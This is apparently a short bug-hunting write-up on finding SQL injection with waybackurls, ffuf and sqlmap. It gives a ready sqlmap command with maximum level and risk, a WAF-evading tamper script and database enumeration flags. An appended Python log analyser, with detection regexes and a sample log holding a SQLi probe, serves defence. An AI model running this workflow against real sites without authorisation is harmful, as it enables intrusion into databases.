How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

Enumeration Phase:

waybackurls | uro | grep ".php" > php-files.txt

uro is a tool that removes duplicate URLs from the list.

Getting Parameters:

ffuf -w lowercase-parameters.txt -u ""
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u ""


sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms="MYSQL" --hostname --current-user --current-db --dbs --tamper=between --no-cast
--level 5 --> level of tests to perform
--risk 3 --> risk of tests to perform
--dbms --> force the back-end DBMS type
--no-cast --> turn off payload casting (avoids CAST-like statements while fetching data)
--tamper --> apply a tamper script to evade filters and WAFs
"--hostname --current-user --current-db --dbs" --> retrieve information about the database
[Screenshots of the four findings: 1st SQLi, 2nd SQLi, 3rd SQLi, 4th SQLi]
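A defender-side counterpart to the workflow above, added here and not part of the original post: a small Python access-log analyser that flags the traces this ffuf-then-sqlmap sequence leaves behind (tool User-Agents, SQL-looking parameter values, and a burst of distinct parameter names against one path from one client). The log lines, IP addresses and tool version strings are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Default User-Agents of the two tools in the post (trivially changed, so the behavioural check matters more)
TOOL_UA_RE = re.compile(r"sqlmap/|Fuzz Faster U Fool", re.I)
# Decoded values that look like SQL probes, incl. the "NOT BETWEEN 0 AND" form of sqlmap's between tamper
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|\b(?:and|or)\s+\d+\s*=\s*\d+|\bsleep\(|\bnot between 0 and\b", re.I)

def parse_line(line):
    """Parse one access-log line into ip, path, decoded query params and UA; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {"ip": m["ip"], "ua": m["ua"], "path": url.path,
            "params": parse_qsl(url.query, keep_blank_values=True)}  # parse_qsl percent-decodes

def analyse(lines, fuzz_threshold=5):
    """Return (kind, ip, path, detail) findings: tool UAs, SQLi-looking values, parameter-name fuzzing."""
    names_seen = defaultdict(set)  # (ip, path) -> distinct query parameter names seen
    findings = []
    for rec in filter(None, map(parse_line, lines)):
        if TOOL_UA_RE.search(rec["ua"]):
            findings.append(("tool_user_agent", rec["ip"], rec["path"], rec["ua"]))
        for name, value in rec["params"]:
            names_seen[(rec["ip"], rec["path"])].add(name)
            if SQLI_RE.search(value):
                findings.append(("sqli_payload", rec["ip"], rec["path"], f"{name}={value}"))
    for (ip, path), names in names_seen.items():
        if len(names) >= fuzz_threshold:  # many different parameter names on one path = wordlist fuzzing
            findings.append(("param_fuzzing", ip, path, f"{len(names)} distinct parameter names"))
    return findings

# Constructed sample log (not from the post): a normal visitor, an ffuf-style parameter-name burst, one sqlmap probe
SAMPLE_LOG = [
    '198.51.100.7 - - [10/May/2024:10:00:00 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
] + [
    f'203.0.113.5 - - [10/May/2024:10:00:01 +0000] "GET /search.php?{p}=5 HTTP/1.1" 200 512 "-" "Fuzz Faster U Fool v2.1.0"'
    for p in ("id", "name", "user", "page", "commitment")
] + [
    '203.0.113.5 - - [10/May/2024:10:00:09 +0000] "GET /search.php?commitment=5%27%20AND%201=1--%20- HTTP/1.1" '
    '200 530 "-" "sqlmap/1.8 (https://sqlmap.org)"',
]

if __name__ == "__main__":
    print(*analyse(SAMPLE_LOG), sep="\n")
```

The User-Agent check is the weakest signal, since both tools accept a custom one; the distinct-parameter-name count per client and path is what survives that change.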


